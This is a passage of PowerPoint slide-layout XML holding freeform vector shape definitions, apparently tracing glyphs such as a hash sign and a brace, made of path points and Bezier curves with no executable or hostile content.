                      <a:pt x="112" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="67"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="120" y="84"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="78" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12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Freeform 354"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4940"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Freeform 355"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5137"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Freeform 356"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5286" y="1833"/>
                <a:ext cx="154"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Freeform 357"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5483"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Freeform 358"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="563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Freeform 359"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5828"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Freeform 360"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="597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Freeform 361"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6172"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Freeform 362"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6356" y="1838"/>
                <a:ext cx="189" cy="219"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 189"/>
                  <a:gd name="T1" fmla="*/ 67 h 219"/>
                  <a:gd name="T2" fmla="*/ 185 w 189"/>
                  <a:gd name="T3" fmla="*/ 84 h 219"/>
                  <a:gd name="T4" fmla="*/ 142 w 189"/>
                  <a:gd name="T5" fmla="*/ 84 h 219"/>
                  <a:gd name="T6" fmla="*/ 131 w 189"/>
                  <a:gd name="T7" fmla="*/ 135 h 219"/>
                  <a:gd name="T8" fmla="*/ 178 w 189"/>
                  <a:gd name="T9" fmla="*/ 135 h 219"/>
                  <a:gd name="T10" fmla="*/ 174 w 189"/>
                  <a:gd name="T11" fmla="*/ 153 h 219"/>
                  <a:gd name="T12" fmla="*/ 128 w 189"/>
                  <a:gd name="T13" fmla="*/ 153 h 219"/>
                  <a:gd name="T14" fmla="*/ 113 w 189"/>
                  <a:gd name="T15" fmla="*/ 219 h 219"/>
                  <a:gd name="T16" fmla="*/ 92 w 189"/>
                  <a:gd name="T17" fmla="*/ 219 h 219"/>
                  <a:gd name="T18" fmla="*/ 107 w 189"/>
                  <a:gd name="T19" fmla="*/ 153 h 219"/>
                  <a:gd name="T20" fmla="*/ 64 w 189"/>
                  <a:gd name="T21" fmla="*/ 153 h 219"/>
                  <a:gd name="T22" fmla="*/ 51 w 189"/>
                  <a:gd name="T23" fmla="*/ 219 h 219"/>
                  <a:gd name="T24" fmla="*/ 30 w 189"/>
                  <a:gd name="T25" fmla="*/ 219 h 219"/>
                  <a:gd name="T26" fmla="*/ 44 w 189"/>
                  <a:gd name="T27" fmla="*/ 153 h 219"/>
                  <a:gd name="T28" fmla="*/ 0 w 189"/>
                  <a:gd name="T29" fmla="*/ 153 h 219"/>
                  <a:gd name="T30" fmla="*/ 3 w 189"/>
                  <a:gd name="T31" fmla="*/ 135 h 219"/>
                  <a:gd name="T32" fmla="*/ 47 w 189"/>
                  <a:gd name="T33" fmla="*/ 135 h 219"/>
                  <a:gd name="T34" fmla="*/ 58 w 189"/>
                  <a:gd name="T35" fmla="*/ 84 h 219"/>
                  <a:gd name="T36" fmla="*/ 12 w 189"/>
                  <a:gd name="T37" fmla="*/ 84 h 219"/>
                  <a:gd name="T38" fmla="*/ 15 w 189"/>
                  <a:gd name="T39" fmla="*/ 67 h 219"/>
                  <a:gd name="T40" fmla="*/ 62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59 w 189"/>
                  <a:gd name="T53" fmla="*/ 0 h 219"/>
                  <a:gd name="T54" fmla="*/ 145 w 189"/>
                  <a:gd name="T55" fmla="*/ 67 h 219"/>
                  <a:gd name="T56" fmla="*/ 189 w 189"/>
                  <a:gd name="T57" fmla="*/ 67 h 219"/>
                  <a:gd name="T58" fmla="*/ 122 w 189"/>
                  <a:gd name="T59" fmla="*/ 84 h 219"/>
                  <a:gd name="T60" fmla="*/ 79 w 189"/>
                  <a:gd name="T61" fmla="*/ 84 h 219"/>
                  <a:gd name="T62" fmla="*/ 68 w 189"/>
                  <a:gd name="T63" fmla="*/ 135 h 219"/>
                  <a:gd name="T64" fmla="*/ 111 w 189"/>
                  <a:gd name="T65" fmla="*/ 135 h 219"/>
                  <a:gd name="T66" fmla="*/ 122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4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="67"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="122" y="84"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="79" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12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Freeform 363"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6574"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Freeform 364"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6769"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Freeform 365"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6966"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Freeform 366"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7114"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Freeform 367"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7312"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Freeform 368"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7454" y="1838"/>
                <a:ext cx="76"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7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7"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369"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7562" y="1838"/>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5 h 240"/>
                  <a:gd name="T14" fmla="*/ 21 w 63"/>
                  <a:gd name="T15" fmla="*/ 155 h 240"/>
                  <a:gd name="T16" fmla="*/ 42 w 63"/>
                  <a:gd name="T17" fmla="*/ 120 h 240"/>
                  <a:gd name="T18" fmla="*/ 42 w 63"/>
                  <a:gd name="T19" fmla="*/ 120 h 240"/>
                  <a:gd name="T20" fmla="*/ 21 w 63"/>
                  <a:gd name="T21" fmla="*/ 84 h 240"/>
                  <a:gd name="T22" fmla="*/ 21 w 63"/>
                  <a:gd name="T23" fmla="*/ 44 h 240"/>
                  <a:gd name="T24" fmla="*/ 0 w 63"/>
                  <a:gd name="T25" fmla="*/ 17 h 240"/>
                  <a:gd name="T26" fmla="*/ 0 w 63"/>
                  <a:gd name="T27" fmla="*/ 0 h 240"/>
                  <a:gd name="T28" fmla="*/ 41 w 63"/>
                  <a:gd name="T29" fmla="*/ 43 h 240"/>
                  <a:gd name="T30" fmla="*/ 41 w 63"/>
                  <a:gd name="T31" fmla="*/ 83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8" y="129"/>
                      <a:pt x="41" y="138"/>
                      <a:pt x="41" y="157"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="198"/>
                      <a:pt x="41" y="198"/>
                      <a:pt x="41" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="226"/>
                      <a:pt x="27" y="240"/>
                      <a:pt x="0" y="240"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="223"/>
                      <a:pt x="0" y="223"/>
                      <a:pt x="0" y="223"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="223"/>
                      <a:pt x="13" y="221"/>
                      <a:pt x="16" y="216"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="212"/>
                      <a:pt x="21" y="205"/>
                      <a:pt x="21" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="155"/>
                      <a:pt x="21" y="155"/>
                      <a:pt x="21" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="136"/>
                      <a:pt x="28" y="124"/>
                      <a:pt x="42" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="120"/>
                      <a:pt x="42" y="120"/>
                      <a:pt x="42" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="115"/>
                      <a:pt x="21" y="103"/>
                      <a:pt x="21" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="44"/>
                      <a:pt x="21" y="44"/>
                      <a:pt x="21" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="27"/>
                      <a:pt x="14" y="18"/>
                      <a:pt x="0" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27" y="0"/>
                      <a:pt x="41" y="14"/>
                      <a:pt x="41" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="83"/>
                      <a:pt x="41" y="83"/>
                      <a:pt x="41" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="101"/>
                      <a:pt x="48"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Freeform 370"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7669"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Freeform 371"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2581" y="182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4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5"/>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9"/>
                      <a:pt x="72" y="199"/>
                      <a:pt x="68" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="208"/>
                      <a:pt x="54" y="209"/>
                      <a:pt x="48" y="207"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="206"/>
                      <a:pt x="38" y="204"/>
                      <a:pt x="32" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="200"/>
                      <a:pt x="18" y="199"/>
                      <a:pt x="11" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="197"/>
                      <a:pt x="7" y="196"/>
                      <a:pt x="5" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="194"/>
                      <a:pt x="0" y="191"/>
                      <a:pt x="1" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="187"/>
                      <a:pt x="2" y="185"/>
                      <a:pt x="2" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="180"/>
                      <a:pt x="5" y="176"/>
                      <a:pt x="3" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="170"/>
                      <a:pt x="2" y="168"/>
                      <a:pt x="2" y="167"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="163"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="7" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="160"/>
                      <a:pt x="12" y="160"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="153"/>
                      <a:pt x="23" y="160"/>
                      <a:pt x="17" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15" y="162"/>
                      <a:pt x="12" y="163"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                      <a:pt x="9" y="162"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="162"/>
                      <a:pt x="3" y="164"/>
                      <a:pt x="4" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5" y="169"/>
                      <a:pt x="6" y="171"/>
                      <a:pt x="6" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="176"/>
                      <a:pt x="8" y="180"/>
                      <a:pt x="6" y="184"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="5" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="4" y="192"/>
                      <a:pt x="7" y="193"/>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3"/>
                      <a:pt x="26" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="33"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9" y="85"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="97"/>
                      <a:pt x="156" y="112"/>
                      <a:pt x="160" y="128"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="161" y="133"/>
                      <a:pt x="161" y="138"/>
                      <a:pt x="160" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="144"/>
                      <a:pt x="159" y="146"/>
                      <a:pt x="159" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="158" y="147"/>
                      <a:pt x="158" y="148"/>
                      <a:pt x="157" y="148"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="149"/>
                      <a:pt x="154" y="151"/>
                      <a:pt x="153" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="154"/>
                      <a:pt x="149" y="156"/>
                      <a:pt x="147" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="144" y="161"/>
                      <a:pt x="139" y="161"/>
                      <a:pt x="135" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="159"/>
                      <a:pt x="132" y="157"/>
                      <a:pt x="131" y="156"/>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9"/>
                      <a:pt x="122" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="189"/>
                      <a:pt x="121" y="192"/>
                      <a:pt x="122" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="202"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="136" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="202"/>
                      <a:pt x="142" y="200"/>
                      <a:pt x="145" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="192"/>
                      <a:pt x="158" y="189"/>
                      <a:pt x="165" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="185"/>
                      <a:pt x="171"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60" y="161"/>
                      <a:pt x="160" y="158"/>
                      <a:pt x="160" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="155"/>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5" y="72"/>
                      <a:pt x="91" y="74"/>
                      <a:pt x="87" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="79"/>
                      <a:pt x="83" y="80"/>
                      <a:pt x="81" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="82"/>
                      <a:pt x="76" y="82"/>
                      <a:pt x="73" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="77"/>
                      <a:pt x="69" y="74"/>
                      <a:pt x="67" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="71"/>
                      <a:pt x="66" y="70"/>
                      <a:pt x="65" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="70"/>
                      <a:pt x="65" y="71"/>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100"/>
                      <a:pt x="56" y="101"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="105"/>
                      <a:pt x="52" y="108"/>
                      <a:pt x="50" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="117"/>
                      <a:pt x="46" y="122"/>
                      <a:pt x="46" y="127"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="130"/>
                      <a:pt x="46" y="133"/>
                      <a:pt x="46" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="138"/>
                      <a:pt x="45" y="139"/>
                      <a:pt x="45" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45" y="142"/>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3"/>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70"/>
                      <a:pt x="69" y="172"/>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7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="70" y="197"/>
                      <a:pt x="70" y="197"/>
                      <a:pt x="71"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4" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="114" y="173"/>
                      <a:pt x="115" y="173"/>
                      <a:pt x="116" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="173"/>
                      <a:pt x="117"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2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="179"/>
                      <a:pt x="120" y="175"/>
                      <a:pt x="119" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="167"/>
                      <a:pt x="118" y="164"/>
                      <a:pt x="118" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="118" y="157"/>
                      <a:pt x="118" y="153"/>
                      <a:pt x="119" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="148"/>
                      <a:pt x="122" y="146"/>
                      <a:pt x="126" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="126" y="146"/>
                      <a:pt x="126" y="146"/>
                      <a:pt x="127" y="146"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="127" y="142"/>
                      <a:pt x="129" y="140"/>
                      <a:pt x="132" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="138"/>
                      <a:pt x="142" y="139"/>
                      <a:pt x="146" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="138"/>
                      <a:pt x="142" y="138"/>
                      <a:pt x="140" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="119"/>
                      <a:pt x="136"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3" y="103"/>
                      <a:pt x="121" y="99"/>
                      <a:pt x="117" y="95"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="95"/>
                      <a:pt x="117" y="94"/>
                      <a:pt x="117" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="86"/>
                      <a:pt x="112" y="79"/>
                      <a:pt x="108"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0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="93" y="38"/>
                      <a:pt x="95" y="37"/>
                      <a:pt x="98" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="37"/>
                      <a:pt x="101" y="38"/>
                      <a:pt x="102" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="43"/>
                      <a:pt x="103" y="45"/>
                      <a:pt x="102" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="49"/>
                      <a:pt x="101" y="50"/>
                      <a:pt x="102" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="51"/>
                      <a:pt x="107" y="50"/>
                      <a:pt x="107" y="48"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="44"/>
                      <a:pt x="107" y="40"/>
                      <a:pt x="105" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="32"/>
                      <a:pt x="100" y="30"/>
                      <a:pt x="96" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="31"/>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5" y="33"/>
                      <a:pt x="73" y="31"/>
                      <a:pt x="70" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="31"/>
                      <a:pt x="67" y="33"/>
                      <a:pt x="66" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="40"/>
                      <a:pt x="63" y="45"/>
                      <a:pt x="66" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="51"/>
                      <a:pt x="67" y="51"/>
                      <a:pt x="68" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="51"/>
                      <a:pt x="69" y="50"/>
                      <a:pt x="70" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="49"/>
                      <a:pt x="68" y="48"/>
                      <a:pt x="67" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="45"/>
                      <a:pt x="65" y="43"/>
                      <a:pt x="66" y="40"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="37"/>
                      <a:pt x="71" y="36"/>
                      <a:pt x="73" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75"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1"/>
                      <a:pt x="68" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="66"/>
                      <a:pt x="74" y="67"/>
                      <a:pt x="78" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82" y="66"/>
                      <a:pt x="87" y="65"/>
                      <a:pt x="91" y="64"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="63"/>
                      <a:pt x="98" y="62"/>
                      <a:pt x="101" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="101" y="58"/>
                      <a:pt x="102" y="58"/>
                      <a:pt x="103" y="58"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="59"/>
                      <a:pt x="103" y="60"/>
                      <a:pt x="103" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="61"/>
                      <a:pt x="102" y="61"/>
                      <a:pt x="102" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="64"/>
                      <a:pt x="92" y="66"/>
                      <a:pt x="86" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="69"/>
                      <a:pt x="79" y="70"/>
                      <a:pt x="74" y="69"/>
